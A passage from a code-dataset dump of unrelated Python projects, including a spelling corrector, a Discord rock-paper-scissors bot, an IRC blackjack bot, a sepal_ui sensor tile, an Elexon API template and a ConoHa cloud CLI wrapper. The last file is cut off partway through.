# NOTE(review): jaccard_distance and ngrams are imported but unused below.
nltk.download('words')  # ensure the 'words' corpus is available locally
import pandas

correct_spellings = words.words()
spellings_series = pandas.Series(correct_spellings)
spellings_series  # bare expression — only displays output in a notebook

def editreco(entries=['cormulent', 'incendenece', 'validrate']):
    """Return the dictionary word closest (by edit distance) to each entry.

    The mutable default list is never mutated here, so sharing it across
    calls is harmless — but worth keeping in mind.
    """
    outcomes = []
    for entry in entries:
        # Lazily score every dictionary word against this entry.
        distances = ((edit_distance(entry,
                                    word), word)
                     for word in correct_spellings)
        # min over (distance, word) tuples -> smallest distance wins,
        # ties broken alphabetically.
        closest = min(distances)
        outcomes.append(closest[1])
    return outcomes

editreco()

# Collect three words from the user and suggest corrections for each.
userinput = []
for i in range(0,3):
    word = input("threa woeds pleese: ")
    userinput.append(word)
userinput  # bare expression — only displays output in a notebook
editreco(userinput)
|
[
"[email protected]"
] | |
f9d8e67a72e3fb01d707f24b28952f2af2b0fcb1
|
84a0e064213834247f8e66da868c6c132038dd47
|
/main.py
|
a1bbd119205233134637d1373f93c5655663c4ff
|
[] |
no_license
|
AlexJS6/Python_bot
|
ee2ae97afc3af8b24b3831d1bd7485f16a0c007b
|
c253a5fac2971e545455d0f07a8e45777d70d4d2
|
refs/heads/main
| 2023-02-09T20:43:02.932155 | 2020-12-30T16:39:50 | 2020-12-30T16:39:50 | 323,345,013 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,216 |
py
|
import discord
import os
import random
import time

client = discord.Client()  # Connection to discord

# valid player moves for rock-paper-scissors
possibilities = ['stone', 'paper', 'scissors']

@client.event
async def on_ready():
    # fired once the gateway connection is established
    print('We have logged in as {0.user}'.format(client))

@client.event
async def on_message(message):
    """Handle '$PapSciSto' (help text) and '$play' (one game round).

    NOTE(review): ``time.sleep`` blocks the whole asyncio event loop, so the
    bot is unresponsive during countdowns — ``await asyncio.sleep`` would be
    the non-blocking choice. Also ``client.wait_for(..., timeout=5)`` raises
    asyncio.TimeoutError when the player stays silent, and that exception is
    not caught here.
    """
    if message.author == client.user:
        # ignore the bot's own messages to avoid feedback loops
        return

    msg = message.content

    if msg.startswith('$PapSciSto'):
        await message.channel.send('Those are the instructions: \n- Send \'$play\' to play \n- After the countdown send: \'paper\', \'stone\' or \'scissors\' in the 5 seconds \n- And then you will lose because I\'m insane at this game! \nGood Luck!!')

    if msg.startswith('$play'):
        channel = message.channel
        non_split_author = message.author
        author = str(message.author).split('#')[0]  # display name without the #discriminator
        # 3-2-1 countdown, then the "go" message
        for i in range(3, -1, -1):
            time.sleep(1)
            if i == 0:
                await channel.send('GOGOGO MY MAN!')
            else:
                await channel.send(i)

        def check(m):
            """
            Checks if the wait_for is correct
            """
            # accept only a valid move, from the same player, in the same channel
            return m.content in possibilities and m.author == non_split_author and m.channel == channel

        response = await client.wait_for('message', timeout=5, check=check)
        bot_response = random.choice(possibilities)
        await channel.send(bot_response.upper())
        time.sleep(1)
        # Pairwise outcome table: each branch reports bot move, player move, result.
        if bot_response == 'scissors' and response.content == 'paper':
            await channel.send('bot: {0} \n{1}: {2} \nI WON'.format(bot_response, author, response.content))
        if bot_response == 'scissors' and response.content == 'stone':
            await channel.send('bot: {0} \n{1}: {2} \nYOU WON'.format(bot_response, author, response.content))
        if bot_response == 'stone' and response.content == 'paper':
            await channel.send('bot: {0} \n{1}: {2} \nYOU WON'.format(bot_response, author, response.content))
        if bot_response == 'stone' and response.content == 'scissors':
            await channel.send('bot: {0} \n{1}: {2} \nI WON'.format(bot_response, author, response.content))
        if bot_response == 'paper' and response.content == 'scissors':
            await channel.send('bot: {0} \n{1}: {2} \nYOU WON'.format(bot_response, author, response.content))
        if bot_response == 'paper' and response.content == 'stone':
            await channel.send('bot: {0} \n{1}: {2} \nI WON'.format(bot_response, author, response.content))
        if bot_response == response.content:
            await channel.send('bot: {0} \n{1}: {2} \nDRAWWW MY MAN!'.format(bot_response, author, response.content))
        '''else:
            await channel.send('bot: {0} \n{1}: {2} \nDAAMN THERE IS A PROBLEM'.format(bot_response, author, response.content))'''

    '''beginning_time = time.time()
    for i in range(5, -1, -1):
        time.sleep(1)
        if i == 0:
            await message.channel.send('@{0.author} Go'.format(message))
        else:
            await message.channel.send(i)'''

    #await message.channel.send('')
    #await message.channel.send(response)

client.run(os.getenv('TOKEN'))  # bot token is read from the environment
|
[
"[email protected]"
] | |
c4be81c83c88067b9cf207fdeb2ab275f44e2c08
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/F4iemEeFfsaFoMpAF_4.py
|
786cba909da3a937ac21071a5cc1d90693d4e336
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 776 |
py
|
"""
This is a list of single characters with an unwanted character at the end:
["H", "e", "l", "l", "o", "!", "\0"]
You could also just type "Hello!" when initializing a variable, creating the
string "Hello!"
Create a function that will return a string by combining the given character
list, not including the unwanted final character.
### Examples
cpp_txt(["H", "i", "!", "\0"]) ➞ "Hi!"
cpp_txt(["H", "e", "l", "l", "o", "!", "\0"]) ➞ "Hello!"
cpp_txt(["J", "A", "V", "a", "\0"]) ➞ "JAVa"
### Notes
This is a translation of a C++ challenge and is trivial in Python, but perhaps
it will be helpful to someone out there. (No challenge is trivial until you
know how to solve it :)
"""
def cpp_txt(lst):
    """Combine a character list into one string, dropping the trailing terminator.

    An empty list yields the empty string (the slice is simply empty).
    """
    wanted = lst[:-1]
    return "".join(wanted)
|
[
"[email protected]"
] | |
13d3c21576b08012b57d0ca3bc3f2ba7deda7096
|
e84e67f95ca406cc3bb95253f8d7903185848cef
|
/templates/raw_methods.py
|
07947722b7c1806cffda9c17ee3bebbac471b107
|
[
"MIT"
] |
permissive
|
OSUKED/ElexonDataPortal
|
5aca48285a49f6b3ae81fd130d5c5e14672dba15
|
d8be59c56dda41bd8f2a9efbb3620b4b563710da
|
refs/heads/master
| 2023-04-08T05:06:42.193628 | 2023-04-01T18:55:39 | 2023-04-01T18:55:39 | 189,842,391 | 46 | 13 |
MIT
| 2023-09-02T23:03:23 | 2019-06-02T12:14:48 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 508 |
py
|
import requests

{# Jinja2 template: for each entry in ``functions`` generate a thin Python
   wrapper around ``requests.get`` with one keyword argument per documented
   API parameter (each defaulted to its example value) plus an overridable
   ``endpoint``. #}
{% for function in functions %}
def {{ function['name'] }}({% for parameter in function['parameters'] %}
    {{ parameter['name'] }}='{{ parameter['example'] }}',{% endfor %}
    endpoint='{{ function['endpoint'] }}'
):
    """{{ function['description'] }}
    """

    params = { {% for parameter in function['parameters'] %}
        '{{ parameter['name'] }}': {{ parameter['name'] }},{% endfor %}
    }

    r = requests.get(endpoint, params=params)

    return r
{% endfor %}
|
[
"[email protected]"
] | |
53b2af0868849bff57dbd8b705257e3f2690e172
|
a88d9c0176f5e4c0d0bd9664270e000ebb5edbd9
|
/component/tile/sensor_tile.py
|
9b549723c7bbb0854467b7bcc1072e972e246aa2
|
[
"MIT"
] |
permissive
|
sandroklippel/fcdm
|
fb81c73fc6bd1cf296f9301272923c3627474d3f
|
5a54e6352bb574ba409be38882ff0d13b3473b7a
|
refs/heads/master
| 2023-08-19T22:05:52.055545 | 2021-08-24T11:23:40 | 2021-08-24T11:23:40 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,828 |
py
|
from datetime import datetime as dt
from sepal_ui import sepalwidgets as sw
import ipyvuetify as v
from component import parameter as cp
from component.message import cm
class SensorTile(sw.Tile):
    """Sensor-selection tile: satellite picker plus Landsat-7 / cloud sliders.

    All widgets are two-way bound to *model*; the list of selectable sensors
    is kept consistent with the model's reference/analysis date range, and
    Landsat and Sentinel-2 sensors cannot be mixed in one selection.
    """

    def __init__(self, model):

        # create adjustable variables end and start
        self.end = dt.now().year
        self.start = 1950  # prior to any sats

        # create the widgets
        self.sensors_select = v.Select(label=cm.input_lbl.sensor, items=[], v_model=[], multiple=True, chips=True, deletable_chips=True)
        landsat_7_switch = v.Switch(label=cm.input_lbl.do_threshold, v_model =model.improve_L7)
        landsat_7_slider = v.Slider(class_='mt-5', label=cm.input_lbl.threshold, min=0, max=.3, step=.001, v_model=model.improve_threshold, thumb_label='always')
        cloud_buffer = v.Slider(class_='mt-5', label=cm.input_lbl.cloud_buffer, min=0, max =2500, step=10, v_model=model.cloud_buffer, thumb_label='always')

        # bind them to io
        model \
            .bind(self.sensors_select, 'sensors',) \
            .bind(landsat_7_switch, 'improve_L7',) \
            .bind(landsat_7_slider, 'improve_threshold',) \
            .bind(cloud_buffer, 'cloud_buffer',)

        super().__init__(
            'nested_widget',
            cm.tile.sensor,
            inputs = [self.sensors_select, landsat_7_switch, landsat_7_slider, cloud_buffer],
            alert = sw.Alert()
        )

        # add js behaviour
        self.sensors_select.observe(self._check_sensor, 'v_model')
        model.observe(self._change_start, 'reference_start')
        model.observe(self._change_end, 'analysis_end')

    def _check_sensor(self, change):
        """
        prevent users from selecting landsat and sentinel 2 sensors
        provide a warning message to help understanding
        """

        # exit if its a removal
        if len(change['new']) < len(change['old']):
            self.alert.reset()
            return self

        # use positionning in the list as boolean value
        sensors = ['landsat', 'sentinel']

        # guess the new input
        new_value = list(set(change['new']) - set(change['old']))[0]

        id_ = next(i for i, s in enumerate(sensors) if s in new_value)

        if sensors[id_] in new_value:
            # ``not id_`` flips 0<->1 (bool coerces to int) to index the
            # *other* sensor family.
            if any(sensors[not id_] in s for s in change['old']):
                # mixed families: keep only the newly picked sensor and warn
                change['owner'].v_model = [new_value]
                self.alert.add_live_msg(cm.no_mix, 'warning')
            else:
                self.alert.reset()

        return self

    def _change_end(self, change):
        # analysis end date changed: recompute which sensors were flying
        self.end = int(change['new'][:4]) if change['new'] else dt.now().year
        self._check_sensor_availability()

        return self

    def _change_start(self, change):
        # reference start date changed: recompute which sensors were flying
        self.start = int(change['new'][:4]) if change['new'] else 1950
        self._check_sensor_availability()

        return self

    def _check_sensor_availability(self):
        """reduce the number of available satellites based on the dates selected by the user"""

        # reset current values
        self.sensors_select.items = []
        self.sensors_select.v_model = []

        # check every satellite availability
        years = range(self.start, self.end + 1)
        sensors = []
        for s in cp.sensors:
            # keep a sensor if its mission start or end year falls inside the
            # window, or if the mission fully spans the window
            if any(e in years for e in [cp.sensors[s]['start'], cp.sensors[s]['end']]):
                sensors.append(s)
            elif cp.sensors[s]['start'] < self.start and cp.sensors[s]['end'] > self.end:
                sensors.append(s)

        self.sensors_select.items = sensors

        return self
|
[
"[email protected]"
] | |
f649e05cb3c2513dbd63376cb0fe10827d696e1d
|
f137ceab2fd55f79777974a624119001457e0cb9
|
/blackjack/core/irc.py
|
a88346a8ed59c8835fb9a0c5c469c804f88decaf
|
[
"ISC"
] |
permissive
|
dingopride/blackjack
|
bbd97a0b34d57dd40056540d5ad2fac674b9b586
|
64bbe82172ee24662b9830bf5fc4111a41362272
|
refs/heads/master
| 2021-09-16T00:23:15.082583 | 2018-06-13T17:09:28 | 2018-06-13T17:09:28 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 13,529 |
py
|
#!/usr/bin/env python
# BlackJack IRC Bot
# Developed by acidvegas in Python
# https://git.acid.vegas/blackjack
# blackjack.py
import inspect
import os
import random
import socket
import ssl
import threading
import time
import config
import debug
# Data Directories & Files (DO NOT EDIT)
# data_dir is resolved relative to the entry-point script (last stack frame),
# so the bot finds its data files regardless of the current working directory.
data_dir = os.path.join(os.path.dirname(os.path.realpath(inspect.stack()[-1][1])), 'data')
cheat_file = os.path.join(data_dir, 'cheat.txt')
help_file = os.path.join(data_dir, 'help.txt')
# Card Types: (symbol used in the ASCII art, full suit name)
club = ('♣','clubs')
diamond = ('♦','diamonds')
heart = ('♥','hearts')
spade = ('♠','spades')
# Deck Table (Name, ASCII, Value, Remaining Suits)
# - index 0 (ASCII art) is filled in later by IRC.setup_deck()
# - index 1 is the blackjack value; ace is mutated to 1 after the first ace
# - index 2 is the list of suits still available to draw for that rank
deck = {
    'ace'   : [None, 11, [club,diamond,heart,spade]],
    'two'   : [None, 2,  [club,diamond,heart,spade]],
    'three' : [None, 3,  [club,diamond,heart,spade]],
    'four'  : [None, 4,  [club,diamond,heart,spade]],
    'five'  : [None, 5,  [club,diamond,heart,spade]],
    'six'   : [None, 6,  [club,diamond,heart,spade]],
    'seven' : [None, 7,  [club,diamond,heart,spade]],
    'eight' : [None, 8,  [club,diamond,heart,spade]],
    'nine'  : [None, 9,  [club,diamond,heart,spade]],
    'ten'   : [None, 10, [club,diamond,heart,spade]],
    'jack'  : [None, 10, [club,diamond,heart,spade]],
    'queen' : [None, 10, [club,diamond,heart,spade]],
    'king'  : [None, 10, [club,diamond,heart,spade]]
}
# Formatting Control Characters / Color Codes (mIRC protocol escapes)
bold        = '\x02'
italic      = '\x1D'
underline   = '\x1F'
reverse     = '\x16'
reset       = '\x0f'
# Two-digit mIRC color numbers used with the \x03 color escape.
white       = '00'
black       = '01'
blue        = '02'
green       = '03'
red         = '04'
brown       = '05'
purple      = '06'
orange      = '07'
yellow      = '08'
light_green = '09'
cyan        = '10'
light_cyan  = '11'
light_blue  = '12'
pink        = '13'
grey        = '14'
light_grey  = '15'
def color(msg, foreground, background=None):
    """Wrap *msg* in mIRC color escapes (foreground, optional background)."""
    prefix = '\x03' + foreground
    if background:
        prefix += ',' + background
    return prefix + msg + reset
class IRC(object):
    """Single-channel IRC client that runs one blackjack game at a time.

    ``self.player`` holds the nick of the active player (None when idle).
    Card state lives in the module-level ``deck`` table and is restored by
    ``reset()``.
    """

    def __init__(self):
        self.ace_minus = False  # True once an ace has been downgraded from 11 to 1
        self.hand = None        # rendered hand: flat list (mini deck) or dict of 5 ASCII rows
        self.last_move = 0      # timestamp of the player's last action (watched by timer())
        self.last_time = 0      # timestamp of the last handled command (anti-flood)
        self.player = None      # nick of the active player
        self.total = 0          # current hand value
        self.mini_deck = False
        self.sock = None
        # Fix: timer() read self.game_timeout, which was never defined anywhere,
        # raising AttributeError in the timer thread as soon as a game started.
        self.game_timeout = 300  # seconds of inactivity before a game is aborted

    def action(self, chan, msg):
        """Send a CTCP ACTION (/me) to the channel."""
        self.sendmsg(chan, '\x01ACTION {0}\x01'.format(msg))

    def connect(self):
        """Open the socket, register with the server, then enter the read loop."""
        try:
            self.create_socket()
            self.sock.connect((config.connection.server, config.connection.port))
            if config.login.network:
                self.raw('PASS ' + config.login.network)
            self.raw('USER {0} 0 * :{1}'.format(config.ident.username, config.ident.realname))
            self.raw('NICK ' + config.ident.nickname)
        except socket.error as ex:
            debug.error('Failed to connect to IRC server.', ex)
            self.event_disconnect()
        else:
            self.listen()

    def create_socket(self):
        """Create the (optionally IPv6 / vhost-bound / TLS-wrapped) socket."""
        family = socket.AF_INET6 if config.connection.ipv6 else socket.AF_INET
        self.sock = socket.socket(family, socket.SOCK_STREAM)
        if config.connection.vhost:
            self.sock.bind((config.connection.vhost, 0))
        if config.connection.ssl:
            # NOTE(review): ssl.wrap_socket() is deprecated and removed in
            # Python 3.12; migrate to ssl.SSLContext().wrap_socket().
            self.sock = ssl.wrap_socket(self.sock)

    def draw(self):
        """Draw a random remaining card into the hand; return (rank, suit)."""
        card_type = random.choice(list(deck.keys()))
        remaining = deck[card_type][2]
        while not remaining:  # re-roll until a rank with remaining suits is found
            card_type = random.choice(list(deck.keys()))
            remaining = deck[card_type][2]
        card_suit = random.choice(remaining)
        if card_suit in (heart, diamond):
            card_color = red
        else:
            card_color = black
        card_value = deck[card_type][1]
        if self.mini_deck:
            card = deck[card_type][0].replace('X', card_suit[0])
            card = color(card, card_color, white)
            self.hand.append(card)
        else:
            # the normal deck renders each card as 5 ASCII rows
            for row in range(5):
                card = deck[card_type][0][row].replace('X', card_suit[0])
                card = color(card, card_color, white)
                self.hand[row].append(card)
        deck[card_type][2].remove(card_suit)
        self.total += card_value
        if card_type == 'ace' and deck['ace'][1] != 1:
            deck['ace'][1] = 1  # only the first ace counts 11; later aces count 1
        return (card_type, card_suit)

    def error(self, chan, msg, reason=None):
        """Send a formatted [ERROR] line, optionally with a grey reason suffix."""
        if reason:
            self.sendmsg(chan, '[{0}] {1} {2}'.format(color('ERROR', red), msg, color('({0})'.format(str(reason)), grey)))
        else:
            self.sendmsg(chan, '[{0}] {1}'.format(color('ERROR', red), msg))

    def event_connect(self):
        """Post-registration setup: deck, services login, oper, channel join."""
        self.setup_deck('normal')
        if config.login.nickserv:
            # Fix: previously passed self.username, an attribute that does not
            # exist on IRC objects (AttributeError); the configured ident
            # username was intended.
            self.identify(config.ident.username, config.login.nickserv)
        if config.login.operator:
            self.oper(config.ident.username, config.login.operator)
        self.join(config.connection.channel, config.connection.key)

    def event_disconnect(self):
        self.sock.close()
        self.reset()
        time.sleep(10)  # back off before reconnecting
        self.connect()

    def event_kick(self, nick, chan, kicked):
        """Rejoin the home channel if the bot itself was kicked."""
        if kicked == config.ident.nickname and chan == config.connection.channel:
            time.sleep(3)
            self.join(config.connection.channel, config.connection.key)

    def _show_hand(self, chan):
        """Send the ASCII rendering of the current hand to the channel.

        Extracted helper: this display loop was duplicated in the 'hit' and
        'play' handlers and shadowed its own loop variable.
        """
        if self.mini_deck:
            line = ''
            for card in self.hand:
                line += ' ' + card
            self.sendmsg(chan, line)
        else:
            for row in range(5):
                line = ''
                for part in self.hand[row]:
                    line += ' ' + part
                self.sendmsg(chan, line)

    def event_message(self, nick, chan, msg):
        """Dispatch channel messages: '@' info commands and '.' game commands."""
        if chan == config.connection.channel:
            if not msg.startswith('.'):
                # NOTE(review): the action text says "private message" but both
                # help and cheat sheet are sent to the channel — confirm intent.
                if msg == '@help':
                    self.action(chan, 'Sending help in a private message...')
                    # Fix: the file handle was previously leaked (bare open()).
                    with open(help_file) as fp:
                        for line in (l.strip() for l in fp if l):
                            self.sendmsg(chan, line)
                elif msg == '@cheat':
                    self.action(chan, 'Sending cheat sheet in a private message...')
                    with open(cheat_file) as fp:
                        for line in (l.strip() for l in fp if l):
                            self.sendmsg(chan, line)
            else:
                cmd = msg.split()[0][1:]
                if time.time() - self.last_time < 2:  # 2-second anti-flood throttle
                    self.sendmsg(chan, color('Slow down nerd!', red))
                elif cmd == 'hit':
                    if self.player:
                        if self.player == nick:
                            card_type, card_suit = self.draw()
                            self._show_hand(chan)
                            if self.total > 21:
                                if deck['ace'][1] == 1 and not self.ace_minus:
                                    # First bust holding an 11-valued ace:
                                    # count that ace as 1 and re-check.
                                    self.total = self.total - 10
                                    self.ace_minus = True
                                    if self.total > 21:
                                        self.sendmsg(chan, '{0} {1}'.format(color('BUST!', red), color('You went over 21 and lost!', grey)))
                                        self.reset()
                                    else:
                                        self.sendmsg(chan, '{0} {1}'.format(color('You drew a {0} of {1}! Your total is now:'.format(card_type, card_suit[1]), yellow), color(str(self.total), light_blue)))
                                        self.last_move = time.time()
                                else:
                                    self.sendmsg(chan, '{0} {1}'.format(color('BUST!', red), color('You went over 21 and lost!', grey)))
                                    self.reset()
                            else:
                                self.sendmsg(chan, '{0} {1}'.format(color('You drew a {0} of {1}! Your total is now:'.format(card_type, card_suit[1]), yellow), color(str(self.total), light_blue)))
                                self.last_move = time.time()
                        else:
                            self.error(chan, 'You are not currently playing!', '{0} is playing still'.format(self.player))
                    else:
                        self.error(chan, 'You are not currently playing!')
                elif cmd == 'mini':
                    # toggle between the 1-line mini deck and the 5-row deck
                    if not self.player:
                        if self.mini_deck:
                            self.setup_deck('normal')
                            self.sendmsg(chan, '{0} {1}'.format(color('Mini deck has been', yellow), color('DISABLED', red)))
                        else:
                            self.setup_deck('mini')
                            self.sendmsg(chan, '{0} {1}'.format(color('Mini deck has been', yellow), color('ENABLED', green)))
                    else:
                        self.error(chan, 'You can not change the deck in game!')
                elif cmd == 'play':
                    if not self.player:
                        self.player = nick
                        self.action(chan, 'Starting a game of blackjack with {0}!'.format(nick))
                        for _ in range(2):  # opening hand is two cards
                            self.draw()
                        self._show_hand(chan)
                        self.sendmsg(chan, '{0} {1}'.format(color('Your total is now:', yellow), color(str(self.total), light_blue)))
                        self.last_move = time.time()
                        threading.Thread(target=self.timer).start()
                    elif self.player == nick:
                        self.error(chan, 'You have already started a game, please finish or stop the game!')
                    else:
                        self.error(chan, '{0} is currently playing a game, please wait!'.format(self.player))
                elif cmd == 'stand':
                    # NOTE(review): standing only announces the total — there is
                    # no dealer hand, so the game stays open until .stop/timeout.
                    if self.player:
                        if self.player == nick:
                            self.sendmsg(chan, 'You have chosen to stand with {0} as your total.'.format(self.total))
                        else:
                            self.error(chan, 'You are not currently playing!', '{0} is playing still'.format(self.player))
                    else:
                        self.error(chan, 'You are not currently playing!')
                elif cmd == 'stop':
                    if self.player:
                        if self.player == nick:
                            self.action(chan, 'Ending current game with {0}!'.format(nick))
                            self.reset()
                        else:
                            self.error(chan, 'You are not currently playing!', '{0} is playing still'.format(self.player))
                    else:
                        self.error(chan, 'You are not currently playing!')
                self.last_time = time.time()

    def event_nick_in_use(self):
        debug.error_exit('BlackJack is already running.')

    def event_part(self, nick, chan):
        """Abort the game if the active player leaves the channel."""
        if self.player == nick:
            # Fix: previously referenced self.nick, which does not exist on
            # IRC objects; the parting user's nick was intended.
            self.sendmsg(chan, 'The game with {0} has ended.'.format(color(nick, light_blue)))
            self.reset()

    def event_quit(self, nick):
        """Abort the game if the active player quits the network."""
        if self.player == nick:
            # Fix: 'chan' was undefined in this scope and self.nick does not
            # exist; announce in the bot's home channel using the quitter's nick.
            self.sendmsg(config.connection.channel, 'The game with {0} has ended.'.format(color(nick, light_blue)))
            self.reset()

    def handle_events(self, data):
        """Route a single raw IRC line to the matching event handler."""
        args = data.split()
        if args[0] == 'PING':
            self.raw('PONG ' + args[1][1:])
        elif args[1] == '001': # Use 002 or 003 if you run into issues.
            self.event_connect()
        elif args[1] == '433':
            self.event_nick_in_use()
        elif args[1] in ('KICK','PART','PRIVMSG','QUIT'):
            nick = args[0].split('!')[0][1:]
            if nick != config.ident.nickname:  # ignore the bot's own events
                if args[1] == 'KICK':
                    chan = args[2]
                    kicked = args[3]
                    self.event_kick(nick, chan, kicked)
                elif args[1] == 'PART':
                    chan = args[2]
                    self.event_part(nick, chan)
                elif args[1] == 'PRIVMSG':
                    chan = args[2]
                    msg = data.split('{0} PRIVMSG {1} :'.format(args[0], chan))[1]
                    if chan != config.ident.nickname:
                        self.event_message(nick, chan, msg)
                elif args[1] == 'QUIT':
                    self.event_quit(nick)

    def identify(self, username, password):
        """Authenticate with NickServ."""
        self.sendmsg('nickserv', f'identify {username} {password}')

    def oper(self, username, password):
        """Authenticate as an IRC operator.

        Fix: event_connect() called self.oper() but the method was never
        defined, raising AttributeError when config.login.operator was set.
        """
        self.raw(f'OPER {username} {password}')

    def join(self, chan, key=None):
        self.raw(f'JOIN {chan} {key}') if key else self.raw('JOIN ' + chan)

    def listen(self):
        """Read loop: decode server data line by line and dispatch events."""
        while True:
            try:
                data = self.sock.recv(1024).decode('utf-8')
                if data:
                    for line in (line for line in data.split('\r\n') if line):
                        debug.irc(line)
                        if line.startswith('ERROR :Closing Link:') and config.ident.nickname in data:
                            raise Exception('Connection has closed.')
                        elif len(line.split()) >= 2:
                            self.handle_events(line)
                else:
                    debug.error('No data recieved from server.')
                    break
            except (UnicodeDecodeError,UnicodeEncodeError):
                debug.error('Unicode error has occured.')
            except Exception as ex:
                debug.error('Unexpected error occured.', ex)
                break
        self.event_disconnect()

    def mode(self, target, mode):
        self.raw(f'MODE {target} {mode}')

    def raw(self, msg):
        """Send a raw IRC line (CRLF appended)."""
        self.sock.send(bytes(msg + '\r\n', 'utf-8'))

    def reset(self):
        """Restore all per-game state and the shared deck between games."""
        # Fix: previously assigned the dead attribute self.ace instead of
        # clearing self.ace_minus, so every game after an ace downgrade kept
        # treating the first ace as 1.
        self.ace_minus = False
        self.last_move = 0
        self.player = None
        self.total = 0
        if self.mini_deck:
            self.hand = []
        else:
            self.hand = {0:[],1:[],2:[],3:[],4:[]}
        deck['ace'][1] = 11
        for card in deck:
            deck[card][2] = [club,diamond,heart,spade]

    def sendmsg(self, target, msg):
        self.raw(f'PRIVMSG {target} :{msg}')

    def setup_deck(self, deck_type):
        """Install the ASCII templates for 'mini' (1 row) or 'normal' (5 rows)."""
        if deck_type == 'mini':
            self.hand = []
            self.mini_deck = True
            deck['ace'][0]   = 'A X'
            deck['two'][0]   = '2 X'
            deck['three'][0] = '3 X'
            deck['four'][0]  = '4 X'
            deck['five'][0]  = '5 X'
            deck['six'][0]   = '6 X'
            deck['seven'][0] = '7 X'
            deck['eight'][0] = '8 X'
            deck['nine'][0]  = '9 X'
            deck['ten'][0]   = '10X'
            deck['jack'][0]  = 'J X'
            deck['queen'][0] = 'Q X'
            deck['king'][0]  = 'K X'
        elif deck_type == 'normal':
            self.hand = {0:[],1:[],2:[],3:[],4:[]}
            self.mini_deck = False
            deck['ace'][0]   = ('A    ','     ','  X  ','     ','    A')
            deck['two'][0]   = ('2    ','  X  ','     ','  X  ','    2')
            deck['three'][0] = ('3    ','  X  ','  X  ','  X  ','    3')
            deck['four'][0]  = ('4    ',' X X ','     ',' X X ','    4')
            deck['five'][0]  = ('5    ',' X X ','  X  ',' X X ','    5')
            deck['six'][0]   = ('6    ',' X X ',' X X ',' X X ','    6')
            deck['seven'][0] = ('7    ',' X X ',' XXX ',' X X ','    7')
            deck['eight'][0] = ('8    ',' XXX ',' X X ',' XXX ','    8')
            deck['nine'][0]  = ('9    ',' XXX ',' XXX ',' XXX ','    9')
            deck['ten'][0]   = ('10   ',' XXX ','XX XX',' XXX ','   10')
            deck['jack'][0]  = ('J    ','     ','  X  ','     ','    J')
            deck['queen'][0] = ('Q    ','     ','  X  ','     ','    Q')
            deck['king'][0]  = ('K    ','     ','  X  ','     ','    K')

    def timer(self):
        """Background watchdog: abort the game after game_timeout idle seconds."""
        while self.player:
            if time.time() - self.last_move > self.game_timeout:
                self.sendmsg(config.connection.channel, '{0}, you took too long! The game has ended.'.format(self.player))
                self.reset()
                break
            else:
                time.sleep(1)
# Module-level singleton used by the entry-point script.
BlackJack = IRC()
|
[
"[email protected]"
] | |
f18fd140c8e9bfd602bdbefe8fa44a0b679217f3
|
e16f312c9a7c1fc8d977d8d5c33cd95cf7178c15
|
/www/conoha/src/lib/cmd.py
|
ac0d56e47d1465f505e42b8cb21f8559a94b6507
|
[
"Unlicense",
"LicenseRef-scancode-public-domain"
] |
permissive
|
user340/tools
|
c871ce7c916c89f2b03502d28baee6b0e98a1401
|
e743708013a4068d20904eeb89aa664957ede980
|
refs/heads/master
| 2023-02-03T08:45:21.040773 | 2023-01-28T05:43:22 | 2023-01-28T05:43:22 | 124,639,827 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 10,223 |
py
|
#!/usr/bin/env python
import texttable
import time
import re
from lib import api
from lib import exceptions
class ConoHaCmd:
    """CLI-facing wrapper around :class:`lib.api.ConoHaAPI`.

    Most methods return ready-to-print :class:`texttable.Texttable` objects
    describing ConoHa virtual machines and billing data.
    """

    def __init__(self, confname='conf/conohactl.conf'):
        # Private API client; every ConoHa REST call goes through this object.
        self.__api = api.ConoHaAPI(confname=confname)

    def check_id_or_tag(self, string):
        """ If given string is UUID, return it. If not UUID, It may Tag
        Args:
            string (str): UUID or Tag
        Returns:
            str: UUID
        """
        # A UUID looks like 8-4-4-4-12 word-character groups; anything else
        # is treated as a name tag and resolved through the API.
        if re.match(r'\w{8}-\w{4}-\w{4}-\w{4}-\w{12}', string):
            return string
        else:
            return self.get_server_id_from_tag(string)

    def return_table(self, colums=None):
        """Return an empty Texttable with *colums* left/middle-aligned columns
        and header-only decoration.
        """
        if type(colums) is not int:
            raise TypeError
        elif colums < 1:
            raise ValueError('Given argument less than 1')
        table = texttable.Texttable()
        table.set_cols_align(['l' for _ in range(colums)])
        table.set_cols_valign(['m' for _ in range(colums)])
        table.set_deco(texttable.Texttable.HEADER)
        return table

    def return_vm_status_table(self, before, after):
        """Return table that shows changes virtual machine status
        Args:
            before (dict): machine status before operation
            after (dict): machine status after operation
        Returns:
            texttable.Texttable
        """
        table = self.return_table(4)
        table.header(['Tag', 'Previous', '->', 'Now'])
        table.add_row([
            after['server']['metadata']['instance_name_tag'],
            before['server']['status'],
            '->',
            after['server']['status']
        ])
        return table

    def get_vm_list(self):
        """Get all virtual machine list
        Returns:
            texttable.Texttable: It contains server ID and name
        """
        body, _ = self.__api.get_vms_list()
        table = self.return_table(2)
        table.header(['Name', 'UUID'])
        for server in body['servers']:
            table.add_row([server['name'], server['id']])
        return table

    def get_vm_detail(self, server_id):
        """Return VM informations.
        This is `lib.api.get_vm_detail_specified` wrapper method
        Args:
            server_id (str): UUID of virtual machine
        Returns:
            dict: API response body
        """
        body, _ = self.__api.get_vm_detail_specified(server_id)
        return body

    def get_server_id_from_tag(self, tag):
        """ Return VM UUID by given Tag
        Args:
            tag (str): VM Tag
        Returns:
            str: UUID of the matching VM
        Raises:
            TypeError: if *tag* is not a str
            ValueError: if no VM carries the given tag
        """
        if type(tag) is not str:
            raise TypeError
        body, _ = self.__api.get_all_vm_details()
        # linear scan over every VM's instance_name_tag metadata
        for vm in body['servers']:
            if vm['metadata']['instance_name_tag'] == tag:
                return vm['id']
        raise ValueError

    def show_vm_detail(self, server_id, ipv4=True, ipv6=False):
        """Show specified VM informations
        Args:
            server_id (str): UUID of virtual machine
            ipv4 (bool): Flag that show IPv4 address or not
